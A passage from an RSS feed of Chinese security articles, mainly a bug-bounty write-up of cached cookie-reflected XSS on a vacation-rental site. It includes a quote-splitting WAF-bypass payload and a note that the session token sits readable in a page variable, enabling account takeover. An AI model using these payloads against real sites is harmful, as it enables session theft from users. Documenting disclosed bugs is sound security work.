4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf=""><a href="https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js" target="_blank">https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js</a></span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">代码类似：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">var hav=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;cookie 值&#34;</span></span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">服务器有一种“保护”机制，会隐藏双引号 &#34;，但是它没有处理大于号和小于号，也就是 &lt; 和 &gt;。这使我可以闭合 script 标签。并且借助这个双引号隐藏机制，我还能轻松绕过 WAF。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">当我这样发送 Cookie 时，WAF 会触发：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">Cookie: hav=xss</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;&lt;/script&gt;&lt;svg/onload=alert(document.domain)&gt;</span></span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">但是通过在关键字中插入双引号，可以绕过 WAF：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">Cookie: hav=xss</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;&lt;/sc&#34;</span></span><span leaf="">ript&gt;&lt;sv</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;g/onloa&#34;</span></span><span leaf="">d=aler</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;t&#34;</span></span><span leaf="">(document.doma</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;in)&gt;</span></span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">服务器最终反射出来的响应会变成：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">var hav=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;xss&lt;/script&gt;&lt;svg/onload=alert(document.domain)&gt;&#34;</span></span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">服务器认为： </span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf=""><a href="https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js" target="_blank">https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js</a></span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">是一个可以缓存的响应。因此，Cookie 中反射出来的恶意内容会被缓存到这个页面里。之后任何用户访问这个 URL，都会触发 XSS。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">虽然 Session Cookie 设置了 HttpOnly，JavaScript 不能直接读取它，但是在同一个存在 XSS 的页面里，有一个 JavaScript 变量：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">window.INITIAL_STATE.system.cookie</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这里明文保存了 Session。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这四个因素结合起来，最终导致我能够接管用户账号。</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=47d2a37f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRzN7ibzIacWfNrVMZ8cAflpTUcGWMoaLLYk3aCxPgiarVRGzfhM3I6l8oqMLgATre8CAfTVvwIcJUjiaDf6lNvtMUQibZyslfgOmqU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1760213" target="_blank">https://hackerone.com/reports/1760213</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=661ef6df&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499445%26idx%3D1%26sn%3Dab3e978cb7b499afac2b1c57e87b2c9f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 15 May 2026 11:00:00 +0800</pubDate>
    </item>
    <item>
      <title>【项目实战】另一种Swagger测试思路</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499439&amp;idx=1&amp;sn=4c8e9ff14aa181e4bea685213ff5031a</link>
      <description>📝 编者语很多人在做接口测试时，第一反应是：找Swagger文档但在实际项目中，越来越多的系统开始使用：Gr</description>
      <content:encoded><![CDATA[<p><span>隐雾安全</span> <span>2026-05-14 10:00</span> <span style="display: inline-block;">四川</span></p>




  <p>以下文章来源于：隐雾安全</p>
  <strong>隐雾安全</strong>
  <p>隐雾，为您提供职业成功的关键。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8e4553c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRwwUkicGoQcYfeibT6Hk4TIhribd2CiaQwB63GhgY4iaoDlibDFBL2UpT0AU69lylXQ9HVs18eu153XiccX6xyibIyRQ3D5bSsJ3xJeIAs%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>📝 编者语很多人在做接口测试时，第一反应是：找Swagger文档但在实际项目中，越来越多的系统开始使用：Gr</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);margin-bottom: 24px;" data-pm-slice="0 0 []"><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: -7px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 96%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;background-color: rgba(138, 192, 245, 0.09);padding: 20px;height: auto;border-left-style: solid;border-left-width: 5px;border-radius: 2px;overflow: hidden;margin: 0px 0px 20px;box-sizing: border-box;"><div style="text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">📝 </span><strong style="box-sizing: border-box;"><span leaf="">编者语</span></strong></p></div><div style="text-align: justify;font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">很多人在做接口测试时，第一反应是：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">找</span><strong style="box-sizing: border-box;"><span leaf="">Swagger</span></strong><span leaf="">文档</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">但在实际项目中，越来越多的系统开始使用：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);text-align: left;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GraphQL</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">内置调试面板（console / playground）</span></p></li></ul></p><div style="text-align: justify;font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这些东西，本质上就是：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">另一种“接口文档”</span></strong></p></div></div></div><div style="text-align: justify;font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这篇文章，我们用一个真实案例，走一遍：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">从一个功能点 → 找到 GraphQL → 拿到接口结构 → 发现未授权接口</span></strong></p></div></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 4px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 27px;height: 27px;vertical-align: top;overflow: hidden;background-color: rgb(30, 30, 30);box-shadow: rgb(219, 219, 219) 7px 7px 0px 0px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1</span></p></div></div></div></div></div><div style="display: inline-block;vertical-align: top;width: 